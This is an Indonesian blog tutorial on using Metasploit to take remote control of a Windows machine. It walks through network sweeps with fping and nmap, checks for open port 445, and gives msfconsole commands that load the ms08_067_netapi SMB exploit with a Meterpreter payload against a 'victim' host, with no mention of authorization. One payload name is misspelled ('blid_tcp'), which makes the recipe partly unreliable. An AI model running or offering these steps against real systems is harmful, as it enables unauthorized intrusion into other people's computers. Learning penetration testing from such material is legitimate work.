just blog: Metasploit Windows

Kali ini saya akan membahas tentang tutorial metasploit. Metasploit adalah sebuah tool yang digunakan untuk menguji suatu system dengan mengeksploitasi kelemahan dari system itu sendiri. Metasploit biasanya digunakan untuk menyerang application layer dengan 0 day attack yang merupakan metode penyerangan pada software yang belum di patch. Metasploit biasa dikaitkan dengan istilah remote exploitation, maksudnya penyerang berada pada jarak jangkauan yang jauh dapat mengendalikan komputer korban. Metasploit menyerang dengan cara
mengirimkan exploit pada komputer korban. Exploit ini berisi payload yang sudah ditentukan oleh penyerang.

Biasanya kita sering menggunakan Operating System Bracktrack saat melakukan exploitasi, tapi kali ini saya menggunakan OS TeaLinuxOS 2.0 yang sudah dimodif untuk pentest. Langsung saja kita terjun ke tutornya;

Yang perlu anda siapkan :

1.       OS linux

2.       Metasploit Framework

3.       fping (sudo apt-get install fping)

4.       nmap (sudo apt-get install nmap)

5.       target, tanpa target apa yang mau di exploit???

6.       cemilan, kali aja laper dan pusing – pusing dikit saat melakukan exploitasi ehehe

berikut ini langkahnya:

1. scan dahulu semua IP yang terkoneksi dalam jaringan. “fping –g IP_awal IP_akhir”

2. Pilih targetnya, “nmap –A IP_target”

3. Cek dan pastikan kalau kita bisa terkoneksi dengan target.

4. Scan port target kita, pastikan port 445 terbuka. Karena lewat port tersebut kita akan melakukan ekploitasi. Untuk scan port kita pakai nmap, “nmap IP_target”

5. Jalankan metasploit, ketik pada terminal “msfconsole”

6. Untuk melihat exploitasi yang disediakan oleh metasploit gunakan perintah, “show exploits”

7.       “use windows/smb/ms08_067_netapi”

8.       “show payloads” untuk melihat payload yang ada

9.       “set payload windows/meterpreter/blid_tcp”

10.   “set rhost IP_target”

11.   “set lhost IP_kita”

12.   “exploit”